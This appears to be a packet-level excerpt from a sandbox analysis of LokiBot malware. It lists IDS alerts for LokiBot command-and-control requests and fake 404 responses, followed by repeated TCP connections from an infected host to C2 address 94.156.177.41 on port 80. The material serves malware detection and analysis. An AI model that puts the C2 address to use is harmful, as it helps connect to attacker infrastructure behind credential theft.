                                                                                  2024-12-04T06:54:02.961210+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44995094.156.177.4180TCP
                                                                                  2024-12-04T06:54:02.961210+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44995094.156.177.4180TCP
                                                                                  2024-12-04T06:54:03.081113+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449950TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 4, 2024 06:52:06.525391102 CET4973780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:06.645394087 CET804973794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:06.645503998 CET4973780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:06.647583961 CET4973780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:06.767563105 CET804973794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:06.767642021 CET4973780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:06.887603045 CET804973794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:08.289335012 CET804973794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:08.289362907 CET804973794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:08.289515972 CET4973780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:08.289515972 CET4973780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:08.409615040 CET804973794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:08.453470945 CET4973880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:08.573559046 CET804973894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:08.573658943 CET4973880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:08.575700045 CET4973880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:08.695647955 CET804973894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:08.695715904 CET4973880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:08.815867901 CET804973894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:10.175102949 CET804973894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:10.175203085 CET804973894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:10.175293922 CET4973880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:10.175348043 CET4973880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:10.235538006 CET4973980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:10.295397043 CET804973894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:10.356156111 CET804973994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:10.356364012 CET4973980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:10.358481884 CET4973980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:10.478563070 CET804973994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:10.478754044 CET4973980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:10.598934889 CET804973994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:11.901484966 CET804973994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:11.901515007 CET804973994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:11.901578903 CET4973980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:11.901618958 CET4973980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:12.021641970 CET804973994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:12.052459955 CET4974080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:12.173185110 CET804974094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:12.173410892 CET4974080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:12.175564051 CET4974080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:12.295530081 CET804974094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:12.295748949 CET4974080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:12.415819883 CET804974094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:13.773469925 CET804974094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:13.773525000 CET804974094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:13.773577929 CET4974080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:13.773622990 CET4974080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:13.893779039 CET804974094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:13.920792103 CET4974180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:14.040909052 CET804974194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:14.041134119 CET4974180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:14.043212891 CET4974180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:14.163228989 CET804974194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:14.164338112 CET4974180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:14.284452915 CET804974194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:15.532588005 CET804974194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:15.532768965 CET4974180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:15.533066988 CET804974194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:15.533166885 CET4974180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:15.652893066 CET804974194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:15.694436073 CET4974380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:15.814461946 CET804974394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:15.814549923 CET4974380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:15.818129063 CET4974380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:15.938199043 CET804974394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:15.938258886 CET4974380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:16.058465958 CET804974394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:17.218137980 CET804974394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:17.218159914 CET804974394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:17.218225956 CET4974380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:17.218324900 CET4974380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:17.338561058 CET804974394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:17.415494919 CET4974680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:17.535598040 CET804974694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:17.535711050 CET4974680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:17.537750006 CET4974680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:17.657744884 CET804974694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:17.657826900 CET4974680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:17.777792931 CET804974694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:19.025707006 CET804974694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:19.025800943 CET804974694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:19.025824070 CET4974680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:19.025851965 CET4974680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:19.145796061 CET804974694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:19.161326885 CET4975080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:19.281306982 CET804975094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:19.283354044 CET4975080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:19.285294056 CET4975080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:19.405179977 CET804975094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:19.405358076 CET4975080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:19.525259972 CET804975094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:20.880343914 CET804975094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:20.880603075 CET804975094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:20.880675077 CET4975080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:20.882543087 CET4975080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:21.002459049 CET804975094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:21.018975973 CET4975280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:21.138971090 CET804975294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:21.139070988 CET4975280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:21.141326904 CET4975280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:21.262100935 CET804975294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:21.262165070 CET4975280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:21.382390022 CET804975294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:22.682821035 CET804975294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:22.683064938 CET804975294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:22.683187008 CET4975280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:22.685194016 CET4975280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:22.805214882 CET804975294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:22.830600023 CET4975480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:22.950743914 CET804975494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:22.951064110 CET4975480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:22.952970982 CET4975480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:23.072956085 CET804975494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:23.073188066 CET4975480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:23.193212986 CET804975494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:24.551582098 CET804975494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:24.551615953 CET804975494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:24.551832914 CET4975480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:24.551832914 CET4975480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:24.671843052 CET804975494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:24.690256119 CET4975680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:24.810169935 CET804975694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:24.810378075 CET4975680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:24.812109947 CET4975680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:24.932044983 CET804975694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:24.932097912 CET4975680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:25.052181005 CET804975694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:26.402652979 CET804975694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:26.402679920 CET804975694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:26.403487921 CET4975680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:26.403487921 CET4975680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:26.523526907 CET804975694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:26.551208973 CET4975780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:26.671286106 CET804975794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:26.671422005 CET4975780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:26.673463106 CET4975780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:26.793507099 CET804975794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:26.793786049 CET4975780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:26.913836956 CET804975794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:28.258573055 CET804975794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:28.258603096 CET804975794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:28.258701086 CET4975780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:28.258701086 CET4975780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:28.378824949 CET804975794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:28.395833969 CET4975980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:28.515897036 CET804975994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:28.515983105 CET4975980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:28.517987013 CET4975980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:28.638139009 CET804975994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:28.638241053 CET4975980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:28.758470058 CET804975994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:30.177768946 CET804975994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:30.177786112 CET804975994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:30.177926064 CET4975980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:30.177984953 CET4975980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:30.298016071 CET804975994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:30.323266029 CET4976180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:30.443294048 CET804976194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:30.443377018 CET4976180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:30.445363045 CET4976180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:30.565306902 CET804976194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:30.565483093 CET4976180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:30.685517073 CET804976194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:32.085510969 CET804976194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:32.085673094 CET804976194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:32.085851908 CET4976180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:32.094065905 CET4976180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:32.214744091 CET804976194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:32.649805069 CET4976280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:32.769834995 CET804976294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:32.769912958 CET4976280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:32.772286892 CET4976280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:32.892219067 CET804976294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:32.892280102 CET4976280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:33.012454033 CET804976294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:34.340843916 CET804976294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:34.340930939 CET4976280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:34.341106892 CET804976294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:34.341156006 CET4976280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:34.460892916 CET804976294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:34.492723942 CET4976480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:34.612765074 CET804976494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:34.612874031 CET4976480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:34.614860058 CET4976480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:34.734860897 CET804976494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:34.734954119 CET4976480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:34.854918003 CET804976494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:36.018158913 CET804976494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:36.018234015 CET804976494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:36.018357992 CET4976480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:36.018635035 CET4976480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:36.138566971 CET804976494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:36.164129972 CET4976680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:36.284075022 CET804976694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:36.284189939 CET4976680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:36.287272930 CET4976680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:36.408047915 CET804976694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:36.409349918 CET4976680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:36.530024052 CET804976694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:37.879709959 CET804976694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:37.879797935 CET804976694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:37.879905939 CET4976680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:37.893222094 CET4976680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:38.013205051 CET804976694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:38.103513956 CET4976780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:38.223879099 CET804976794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:38.223974943 CET4976780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:38.227730036 CET4976780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:38.347717047 CET804976794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:38.347814083 CET4976780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:38.467822075 CET804976794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:39.817699909 CET804976794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:39.817816019 CET804976794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:39.817895889 CET4976780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:39.817943096 CET4976780192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:39.937958956 CET804976794.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:39.955773115 CET4976880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:40.075944901 CET804976894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:40.076030016 CET4976880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:40.077786922 CET4976880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:40.197741032 CET804976894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:40.197879076 CET4976880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:40.317974091 CET804976894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:41.706990957 CET804976894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:41.707154989 CET4976880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:41.707223892 CET804976894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:41.707273006 CET4976880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:41.827200890 CET804976894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:41.846352100 CET4976980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:41.966331959 CET804976994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:41.966433048 CET4976980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:41.968180895 CET4976980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:42.088063955 CET804976994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:42.088176966 CET4976980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:42.208141088 CET804976994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:43.607929945 CET804976994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:43.607947111 CET804976994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:43.608001947 CET4976980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:43.610594988 CET4976980192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:43.730470896 CET804976994.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:43.826524019 CET4977080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:43.946542978 CET804977094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:43.946865082 CET4977080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:43.954031944 CET4977080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:44.073952913 CET804977094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:44.074153900 CET4977080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:44.194308043 CET804977094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:45.535087109 CET804977094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:45.535109997 CET804977094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:45.535212040 CET4977080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:45.535253048 CET4977080192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:45.655215979 CET804977094.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:45.681427956 CET4977180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:45.801685095 CET804977194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:45.803577900 CET4977180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:45.805480957 CET4977180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:45.925508022 CET804977194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:45.927567005 CET4977180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:46.047624111 CET804977194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:47.435343027 CET804977194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:47.435417891 CET804977194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:47.435569048 CET4977180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:47.435596943 CET4977180192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:47.555547953 CET804977194.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:47.586464882 CET4977280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:47.706475973 CET804977294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:47.706661940 CET4977280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:47.708317995 CET4977280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:47.828212976 CET804977294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:47.828392982 CET4977280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:47.948287010 CET804977294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:49.348959923 CET804977294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:49.349004030 CET804977294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:49.349050999 CET4977280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:49.349081039 CET4977280192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:49.469197989 CET804977294.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:49.537405968 CET4977380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:49.657367945 CET804977394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:49.657480001 CET4977380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:49.659935951 CET4977380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:49.779880047 CET804977394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:49.779958963 CET4977380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:49.899945021 CET804977394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:51.250996113 CET804977394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:51.251019001 CET804977394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:51.251091003 CET4977380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:51.251091003 CET4977380192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:51.371174097 CET804977394.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:51.393459082 CET4977480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:51.513492107 CET804977494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:51.513681889 CET4977480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:51.515549898 CET4977480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:51.635601997 CET804977494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:51.635755062 CET4977480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:51.756563902 CET804977494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:52.949302912 CET804977494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:52.949374914 CET804977494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:52.949423075 CET4977480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:52.951447010 CET4977480192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:53.071413994 CET804977494.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:53.102349043 CET4977580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:53.222512960 CET804977594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:53.222605944 CET4977580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:53.224378109 CET4977580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:53.344413996 CET804977594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:53.344477892 CET4977580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:53.464498997 CET804977594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:54.623199940 CET804977594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:54.623219967 CET804977594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:54.623291969 CET4977580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:54.623326063 CET4977580192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:54.743376017 CET804977594.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:54.767545938 CET4977680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:54.887584925 CET804977694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:54.887703896 CET4977680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:54.889772892 CET4977680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:55.009635925 CET804977694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:55.009702921 CET4977680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:55.129791021 CET804977694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:56.524264097 CET804977694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:56.524399042 CET804977694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:56.524406910 CET4977680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:56.524460077 CET4977680192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:56.644483089 CET804977694.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:56.658569098 CET4977880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:56.778561115 CET804977894.156.177.41192.168.2.4
                                                                                  Dec 4, 2024 06:52:56.778630018 CET4977880192.168.2.494.156.177.41
                                                                                  Dec 4, 2024 06:52:56.780823946 CET4977880192.168.2.494.156.177.41
